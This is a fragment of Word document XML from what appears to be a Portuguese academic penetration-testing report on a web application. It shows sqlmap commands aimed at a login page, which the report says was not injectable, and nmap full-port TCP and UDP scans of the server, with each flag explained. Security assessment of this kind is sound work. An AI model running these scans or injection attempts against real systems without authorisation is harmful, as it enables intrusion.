        <w:r w:rsidRPr="00A5289A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/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A5289A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" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRDefault="008C6DC7" w:rsidP="00B34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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f"  -b  --current -db </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3425E" w:rsidRPr="00D56FE7" w:rsidRDefault="00B3425E" w:rsidP="00B3425E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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>“./sqlmap.py” comando utilizado para executar a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B3425E" w:rsidRDefault="003243CE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 xml:space="preserve">“-u” utilizado </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00B3425E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w: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>“--cookie” utilizado para especificar um cookie de sessão válido a ser passado para o Sqlmap durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B3425E" w:rsidRDefault="008C6DC7" w:rsidP="00B3425E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3425E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--current -db” utilizado para obter o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00B3425E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20770" w:rsidRPr="00D56FE7" w:rsidRDefault="00D20770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20770" w:rsidRPr="00D56FE7" w:rsidRDefault="00D20770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tela de Login não seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D20770" w:rsidRPr="00D56FE7" w:rsidRDefault="00D20770" w:rsidP="00B342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20770" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00D56FE7" w:rsidRDefault="00D76012" w:rsidP="00B3425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>. A figu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2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 xml:space="preserve">mostra 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 xml:space="preserve">que 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>a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>pós a</w:t>
      </w:r>
      <w:r w:rsidR="00D20770" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> execução e as inúmeras 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1A5B8E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s de injeção</w:t>
      </w:r>
      <w:r w:rsidR="00BF1C7D" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o parâmetro informado no comando utilizado não é injetável.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRPr="00D56FE7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EC1DCA" w:rsidP="00EC1DCA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766A" wp14:editId="03EFB939">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>100965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1433195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3905250" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="8" name="Arredondar Retângulo em um Canto Úni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428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D0750" id="Arredondar Retângulo em um Canto Único 8" o:spid="_x0000_s1026" style="position:absolute;margin-left:7.95pt;margin-top:-112.85pt;width:307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" path="m,l3881437,v13152,,23813,10661,23813,23813l3905250,142875,,142875,,xe" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;3881437,0;3905250,23813;3905250,142875;0,142875;0,0" o:connectangles="0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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1792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4462EB1A" wp14:editId="21E2160B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>100965</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5476240" cy="4076700"/>
            <wp:effectExtent l="0" t="0" r="0" b="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70" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 12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aplicação</w:t>
      </w:r>
      <w:r w:rsidR="00F52870" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection via Sqlmap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D20770" w:rsidRPr="00D56FE7" w:rsidRDefault="00D20770" w:rsidP="00D20770">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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EC1DCA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8C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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Repetir a ação da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Sessão de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1 e aumentar o nível de heurística aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5.</w:t>
      </w:r>
      <w:r w:rsidR="00870818" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com o incremento no valor de heurística, aumentaram também a profundidade da árvore de decisão usada nos ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00D20770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utiliz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D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00EC1DCA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252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A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00A5289A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="002D4365" w:rsidRPr="00A5289A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>nomeSistema</w:t>
        </w:r>
        <w:r w:rsidRPr="00A5289A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" –b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC1DCA" w:rsidRDefault="008C6DC7" w:rsidP="00EC1DCA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--cookie="PHSESSID=75ce718b37088517</w:t>
      </w:r>
      <w:r w:rsidR="00EC1DCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cafla733d53c60f" --current -db </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00EC1DCA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--level 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00B17B93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./sqlmap.py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xecutar a aplicação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u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specificar a URL alvo da página a ser explorada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“--cookie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especificar um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t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-current -db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obter o nome do banco de dados utilizado pelo sistema alvo.</w:t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  <w:r w:rsidR="00B17B93" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00EC1DC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“--level 5” </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para aumentar o nível da heurística utilizada no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRPr="00D56FE7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870" w:rsidRPr="00D56FE7" w:rsidRDefault="00F52870" w:rsidP="00EC1D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F52870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e que a tela de Login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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC1DCA" w:rsidRDefault="005967D5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Pr="00D56FE7" w:rsidRDefault="00D76012" w:rsidP="00EC1DCA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Embora tendo aumentado o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e</w:t>
      </w:r>
      <w:r w:rsidR="0040058D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r consequência</w:t>
      </w:r>
      <w:r w:rsidR="0040058D" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> disso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foi possível descobrir o nome do banco de dados utilizado pelo sistema.</w:t>
      </w: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737A20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3 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00737A20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 3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D57137" w:rsidP="00D5713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3.1</w:t>
      </w:r>
      <w:r w:rsidR="00503644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Atividade</w:t>
      </w:r>
      <w:r w:rsidR="00F52870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503644" w:rsidRPr="00D56FE7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nálise do Servidor via Nmap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pós o problema de corrupção do sistema operacional do servidor de dados da aplicação</w:t>
      </w:r>
      <w:r w:rsidR="00B01036" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, relatado na</w:t>
      </w:r>
      <w:r w:rsidR="004850DA" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> seção ATA 05 d</w:t>
      </w:r>
      <w:r w:rsidR="00B01036" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o subcapítulo 4.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, houve mudanças na arquitetura do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de dad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9317F" w:rsidP="0031066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1A1CBE" w:rsidRDefault="001A1CBE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o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan TCP.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 utilizado: nmap -sV -p 1-65535 IP_do_servidor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52360" w:rsidRPr="00D56FE7" w:rsidRDefault="00C52360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nmap” é utilizado para executar a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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>“-sV” é utilizado para realizar o SYN e buscar a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311F69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quais </w:t>
      </w:r>
      <w:r w:rsidR="00311F69" w:rsidRPr="00D56FE7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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>porta</w:t>
      </w:r>
      <w:r w:rsidR="00C52360" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s serão usadas na varredura</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, o delimitador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00310663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é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00310663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9B1DC9" w:rsidRPr="00D56FE7" w:rsidRDefault="009B1DC9" w:rsidP="00B15531">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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5531" w:rsidRPr="00D56FE7" w:rsidRDefault="00B15531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B15531" w:rsidRPr="00D56FE7" w:rsidRDefault="00B15531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descobrir as portas abertas</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, os serviços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e a versão </w:t>
      </w:r>
      <w:r w:rsidR="00A13973" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dos serviços</w:t>
      </w:r>
      <w:r w:rsidR="00BA5C02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que essas portas rodam no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52360" w:rsidRPr="00D56FE7" w:rsidRDefault="00C52360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52360" w:rsidRPr="00D56FE7" w:rsidRDefault="00C52360" w:rsidP="003106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15531" w:rsidRPr="00D56FE7" w:rsidRDefault="00C52360" w:rsidP="0031066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De acordo com a figura </w:t>
      </w:r>
      <w:r w:rsidR="00311F69" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, foi possível descobrir as portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRPr="00D56FE7" w:rsidRDefault="000C4BC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 wp14:anchorId="62AA93BF" wp14:editId="44F2E492">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-22860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>198120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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77DDF" w:rsidP="000C4B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3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Portas TCP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="006C21E3" w:rsidP="000C4BC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Pr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="005F470B" w:rsidRPr="00D56FE7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F470B" w:rsidRPr="00D56FE7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b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Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; 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lastRenderedPageBreak/>
        <w:t>Microsoft Windows microsoft-ds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Apache httpd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– Servidor Web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Microsoft Windows 98 netbios-ssn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– Api que fornece serviços relacionados com a camada de T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>r</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a comunicação de aplicativos locais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Microsoft Firmware Ppt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F470B" w:rsidRPr="000C4BC3" w:rsidRDefault="005F470B" w:rsidP="000C4BC3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1701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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ms-wbt-server</w:t>
      </w:r>
      <w:r w:rsidR="00311F69" w:rsidRPr="000C4BC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>–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 serviço de gerenciamento de hosts </w:t>
      </w:r>
      <w:r w:rsidR="00311F69" w:rsidRPr="000C4B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4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do windows.</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="000C4BC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9317F" w:rsidP="000C4B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:rsidR="001A1CBE" w:rsidRDefault="001A1CBE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o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE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 utilizado: nmap -sU -p 1-65535 IP_do_servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="000C4BC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Pr="00D56FE7" w:rsidRDefault="00A13973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nmap” é utilizado </w:t>
      </w:r>
      <w:r w:rsidR="002D16A4" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para executar a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C4BC3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sU” indica o uso do detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="000C4BC3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0C4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“-p” indicará quais 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0C4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">portas 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 xml:space="preserve">serão </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usa</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4" w:rsidRPr="000C4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>das na varredura</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="000C4B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P_do_servidor informa o IP onde está hospedada a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D16A4" w:rsidRPr="00D56FE7" w:rsidRDefault="002D16A4" w:rsidP="000C4BC3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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sultado esperado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descobrir as portas abertas UDP, os serviços que essas portas rodam no momento do escaneamento.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16A4" w:rsidRPr="00D56FE7" w:rsidRDefault="002D16A4" w:rsidP="00B004A6">
      <w:p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2D16A4" w:rsidRPr="00D56FE7" w:rsidRDefault="002D16A4" w:rsidP="00B004A6">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-142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De acordo com a figura 14, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foi possível descobrir as portas abertas e os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRPr="00D56FE7" w:rsidRDefault="007F53C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 wp14:anchorId="1E067DC7" wp14:editId="7A1403AC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>120015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>202565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5181600" cy="3463290"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810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77DDF" w:rsidP="007F53C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14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Portas UDP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="002D16A4" w:rsidP="00F134D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erviços e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Pr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>figura 14</w:t>
      </w:r>
      <w:r w:rsidR="00A66072"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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios-ns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NetBios [4]; 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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netbios -dgm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 - serviço de datagrams do NetBios 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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snmp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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4" w:rsidRPr="00F134D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- protocolo windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00F134D7" w:rsidRDefault="00915C31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2TP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F134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134D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(Protocolo de Encapsulamento de Camada 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F134D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34D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat-t-like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 - protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F134D7" w:rsidRDefault="00A66072" w:rsidP="00F134D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134D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F134D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protoco</w:t>
      </w:r>
      <w:r w:rsidR="002D16A4" w:rsidRPr="00F134D7">
        <w:rPr>
